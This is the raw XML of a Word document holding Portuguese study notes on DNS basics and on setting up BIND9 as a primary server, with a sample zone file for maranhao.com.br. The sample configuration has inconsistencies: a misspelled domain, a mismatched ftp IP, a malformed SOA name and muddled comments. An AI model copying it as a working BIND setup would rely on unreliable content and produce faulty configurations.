      </w:r>
    </w:p>
    <w:p w:rsidR="00213251" w:rsidRPr="006E2401" w:rsidRDefault="00213251" w:rsidP="006E240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Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00213251" w:rsidRPr="006E2401" w:rsidRDefault="00213251" w:rsidP="006E240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Recursivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00902438" w:rsidRPr="006E2401" w:rsidRDefault="00213251" w:rsidP="006E240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toritativo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00902438" w:rsidRPr="006E2401" w:rsidRDefault="00902438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Domínio raiz = representado por um “.”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00902438" w:rsidRPr="006E2401" w:rsidRDefault="00902438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CTLD – Country Top Level Domain – ar, br, co</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6743" w:rsidRPr="006E2401" w:rsidRDefault="00902438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GTLD – Generic Top Level Domain – com, org, gov</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA54C8" w:rsidRPr="006E2401" w:rsidRDefault="00AA54C8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AA54C8" w:rsidRPr="006E2401" w:rsidRDefault="00AA54C8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 w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INSTALAR DNS</w:t>
      </w:r>
      <w:r w:rsidR="00200CB3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIMÁRIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA54C8" w:rsidRPr="006E2401" w:rsidRDefault="00AA54C8" w:rsidP="006E2401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 install bind9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A058CD" w:rsidRPr="006E2401" w:rsidRDefault="00A058CD" w:rsidP="006E2401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d /etc/bind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A058CD" w:rsidRPr="006E2401" w:rsidRDefault="00A058CD" w:rsidP="006E2401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less db.root </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A058CD" w:rsidRPr="006E2401" w:rsidRDefault="00A058CD" w:rsidP="006E2401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#arquivo dos 13 endereços ip root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A058CD" w:rsidRPr="006E2401" w:rsidRDefault="00A058CD" w:rsidP="006E2401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less named.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E2401" w:rsidRDefault="00A058CD" w:rsidP="006E2401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#arquivo que é uma junção de todos os outros do /etc/bind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E2401" w:rsidRDefault="006E2401" w:rsidP="006E2401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named.conf.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRDefault="007D7019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[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 Do any local configuration here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 Consider adding the 1918 zones here, if they are not used in your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 organization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include "/etc/bind/zones.rfc1918";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>//Zona Maranhão [Apenas para testar]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>zone "maranhao.com.br" {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 xml:space="preserve">        type master;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027385D" w:rsidRP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 xml:space="preserve">        file "/etc/bind/db.maranhao.com.br";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027385D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>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRDefault="007D7019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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027385D" w:rsidRDefault="0027385D" w:rsidP="0027385D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:</w:t>
      </w:r>
      <w:r w:rsidR="00200CB3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027385D" w:rsidRDefault="0027385D" w:rsidP="0027385D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cp db.empty db.maranha.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRDefault="0027385D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#db.empy = arquivo vazio para configuração de zonas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRDefault="007D7019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[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRPr="007D7019" w:rsidRDefault="007D7019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7D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$TTL    86400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>#Tempo que a informação do domínio vai ficar armazenado no cache do cliente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRDefault="00BC5E5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1616</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>850151</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="438603" cy="783400"/>
                <wp:effectExtent l="0" t="0" r="57150" b="93345"/>
                <wp:wrapNone/>
                <wp:docPr id="16" name="Conector angu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603" cy="78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31E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6" o:spid="_x0000_s1026" type="#_x0000_t34" style="position:absolute;margin-left:152.9pt;margin-top:66.95pt;width:34.55pt;height:6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EDB23" wp14:editId="1819C8C0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>153670</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>693420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2244090" cy="652780"/>
                <wp:effectExtent l="0" t="0" r="22860" b="139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Default="00376B85">
                            <w:r>
                              <w:t>código de referência para sincronização (AAAAMMDDNum de modificações do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EDB2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2.1pt;margin-top:54.6pt;width:176.7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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85">
                      <w:r>
                        <w:t>código de referência para sincronização (AAAAMMDDNum de modificações do arqui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EC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9FB2F" wp14:editId="16361557">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5634289</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>683598</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="688768" cy="2375065"/>
                <wp:effectExtent l="0" t="0" r="54610" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1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37506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C8EA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" o:spid="_x0000_s1026" type="#_x0000_t88" style="position:absolute;margin-left:443.65pt;margin-top:53.85pt;width:54.25pt;height:1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" adj="522" strokecolor="black [3213]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007D7019" w:rsidRPr="007D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">@       IN      SOA     </w:t>
      </w:r>
      <w:r w:rsidR="009022DE" w:rsidRPr="00B96B34">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ns1. maranhão.com.br</w:t>
      </w:r>
      <w:r w:rsidR="007D7019" w:rsidRPr="007D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004F4168">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>root.localhost</w:t>
      </w:r>
      <w:r w:rsidR="00C25CAB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="004F4168">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C25CAB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C25CAB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009022DE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@ = inicío de configuração para o bind; IN = domínio de internet; S0A = autoritativo do domínio; ns1 = name server 1 (primário)</w:t>
      </w:r>
      <w:r w:rsidR="004F4168">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; root.localhost =e endereço de e-mail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00374FF2" w:rsidRDefault="00374FF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374FF2" w:rsidRPr="007D7019" w:rsidRDefault="00BC5E5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374FF2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53C70" wp14:editId="211C7EDD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-302821</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>280282</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2244436" cy="225632"/>
                <wp:effectExtent l="0" t="0" r="22860" b="222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225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Default="00376B85" w:rsidP="00374FF2">
                            <w:r>
                              <w:t>Tempo para atualizar o ca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3C70" id="Caixa de texto 9" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-23.85pt;margin-top:22.05pt;width:176.7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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85" w:rsidP="00374FF2">
                      <w:r>
                        <w:t>Tempo para atualizar o cahe</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRPr="007D7019" w:rsidRDefault="00BC5E5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C9254" wp14:editId="7DA6928E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1953491</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7364</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="461901" cy="391070"/>
                <wp:effectExtent l="0" t="0" r="71755" b="85725"/>
                <wp:wrapNone/>
                <wp:docPr id="17" name="Conector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01" cy="391070"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 2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BF38" id="Conector angulado 17" o:spid="_x0000_s1026" type="#_x0000_t34" style="position:absolute;margin-left:153.8pt;margin-top:.6pt;width:36.35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" adj="5796" strokecolor="#5b9bd5 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B96B34">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidR="00B96B34" w:rsidRPr="00B96B34">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2018031901</w:t>
      </w:r>
      <w:r w:rsidR="00B96B34"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 w:rsidR="00B96B34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</w:t>
      </w:r>
      <w:r w:rsidR="007D7019" w:rsidRPr="007D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>; Serial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRPr="007D7019" w:rsidRDefault="00BC5E5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374FF2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50DD5" wp14:editId="539073CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-290945</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>281346</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2244436" cy="570016"/>
                <wp:effectExtent l="0" t="0" r="22860" b="209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Default="00376B85" w:rsidP="00BC5E52">
                            <w:r>
                              <w:t>Tempo (s) para caso o primário falhe o secundário as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0DD5" id="Caixa de texto 19" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-22.9pt;margin-top:22.15pt;width:176.75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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85" w:rsidP="00BC5E52">
                      <w:r>
                        <w:t>Tempo (s) para caso o primário falhe o secundário assuma</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007C5EC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0C0ED" wp14:editId="4B85FAA5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>6501154</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7051</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2030680" cy="1163782"/>
                <wp:effectExtent l="0" t="0" r="27305" b="1778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0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Pr="007C5ECD" w:rsidRDefault="00376B85" w:rsidP="007C5ECD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 w:rsidRPr="007C5ECD">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Sincronismo do DNS secundário com o DND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C0ED" id="Caixa de texto 2" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:511.9pt;margin-top:.55pt;width:159.9pt;height:91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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRPr="007C5ECD" w:rsidRDefault="00376B85" w:rsidP="007C5ECD">
                      <w:pPr>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="007C5ECD">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Sincronismo do DNS secundário com o DND primário</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007D7019" w:rsidRPr="007D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                         604800         ; Refresh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRPr="007D7019" w:rsidRDefault="007D7019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7D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                          86400         ; Retry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRPr="007D7019" w:rsidRDefault="00374FF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E5545" wp14:editId="5BDA2B88">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1941615</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>80530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="439387" cy="367476"/>
                <wp:effectExtent l="0" t="76200" r="0" b="33020"/>
                <wp:wrapNone/>
                <wp:docPr id="15" name="Conector angul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87" cy="367476"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 45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4A4D" id="Conector angulado 15" o:spid="_x0000_s1026" type="#_x0000_t34" style="position:absolute;margin-left:152.9pt;margin-top:6.35pt;width:34.6pt;height:28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" adj="9909" strokecolor="#5b9bd5 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00374FF2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93906" wp14:editId="266D4943">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-332072</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>355625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2244436" cy="653143"/>
                <wp:effectExtent l="0" t="0" r="22860" b="139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Default="00376B85" w:rsidP="00374FF2">
                            <w:r>
                              <w:t>Tempo máx. que o secundário vai esperar para atualizar o seu cache em relação ao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3906" id="Caixa de texto 7" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-26.15pt;margin-top:28pt;width:176.75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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85" w:rsidP="00374FF2">
                      <w:r>
                        <w:t>Tempo máx. que o secundário vai esperar para atualizar o seu cache em relação ao primário</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007D7019" w:rsidRPr="007D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                        2419200         ; Expire</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7019" w:rsidRPr="007D7019" w:rsidRDefault="00374FF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CD932" wp14:editId="08B5400A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1905990</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>80744</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="628840" cy="771896"/>
                <wp:effectExtent l="0" t="76200" r="0" b="28575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840" cy="771896"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentConnector3">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 51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DD5B" id="Conector angulado 14" o:spid="_x0000_s1026" type="#_x0000_t34" style="position:absolute;margin-left:150.1pt;margin-top:6.35pt;width:49.5pt;height:60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" adj="11191" strokecolor="#5b9bd5 [3204]" strokeweight=".5pt">
                <v:stroke endarrow="block"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007D7019" w:rsidRPr="007D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                          86400 )       ; Negative Cache TTL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00374FF2" w:rsidRDefault="00374FF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374FF2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89D06" wp14:editId="65ACBFCD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-343996</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>363937</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2244436" cy="653143"/>
                <wp:effectExtent l="0" t="0" r="22860" b="1397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Default="00376B85" w:rsidP="00374FF2">
                            <w:r>
                              <w:t>Tempo que o secundário demora para devolver a resolução de nomes ao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9D06" id="Caixa de texto 13" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-27.1pt;margin-top:28.65pt;width:176.75pt;height:5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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85" w:rsidP="00374FF2">
                      <w:r>
                        <w:t>Tempo que o secundário demora para devolver a resolução de nomes ao primário</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00374FF2" w:rsidRDefault="00374FF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374FF2" w:rsidRDefault="00374FF2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7D7019" w:rsidRPr="007D7019" w:rsidRDefault="007D7019" w:rsidP="007D7019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7D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC5E52" w:rsidRDefault="007D7019" w:rsidP="00BC5E5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7D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">@       IN      NS      </w:t>
      </w:r>
      <w:r w:rsidR="00BC5E52">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ns1.maranha.com.br</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7019">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC5E52">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>#NS = name server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC5E52" w:rsidRDefault="00BC5E52" w:rsidP="00BC5E5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@       IN      MX 10   mail1.maranhao.com.br</w:t>
      </w:r>
      <w:r w:rsidR="00AC32B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE095B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># MX = sigla para servidor de email; 10 = 01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44F8E" w:rsidRDefault="00B02A49" w:rsidP="00BC5E5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ns1     IN   </w:t>
      </w:r>
      <w:r w:rsidR="00F44F8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   A       192.168.0.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44F8E" w:rsidRDefault="00B02A49" w:rsidP="00BC5E5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www     IN </w:t>
      </w:r>
      <w:r w:rsidR="00F44F8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     CNAME   ns1</w:t>
      </w:r>
      <w:r w:rsidR="00F44F8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F44F8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F44F8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F44F8E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>#Toda vez que www for digitado ele será substituído por ns1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3F53" w:rsidRPr="005C3F53" w:rsidRDefault="005C3F53" w:rsidP="005C3F5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5C3F53">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ftp     IN      A       196.168.0.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44F8E" w:rsidRDefault="005C3F53" w:rsidP="005C3F5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5C3F53">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mail1   IN      A       192.168.0.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3F53" w:rsidRDefault="005C3F53" w:rsidP="005C3F5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:rsidR="005C3F53" w:rsidRDefault="005C3F53" w:rsidP="005C3F5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:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3F53" w:rsidRDefault="005C3F53" w:rsidP="00200CB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yst</w:t>
      </w:r>
      <w:r w:rsidR="00A27AA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas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mctl restart bind9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3F53" w:rsidRDefault="005C3F53" w:rsidP="00200CB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ing www.maranhao.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3F53" w:rsidRDefault="005C3F53" w:rsidP="00200CB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5C3F53">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm /etc/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C3F53" w:rsidRDefault="005C3F53" w:rsidP="00200CB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ing www.maranhao.com.br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200CB3" w:rsidRDefault="00200CB3" w:rsidP="00946841">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
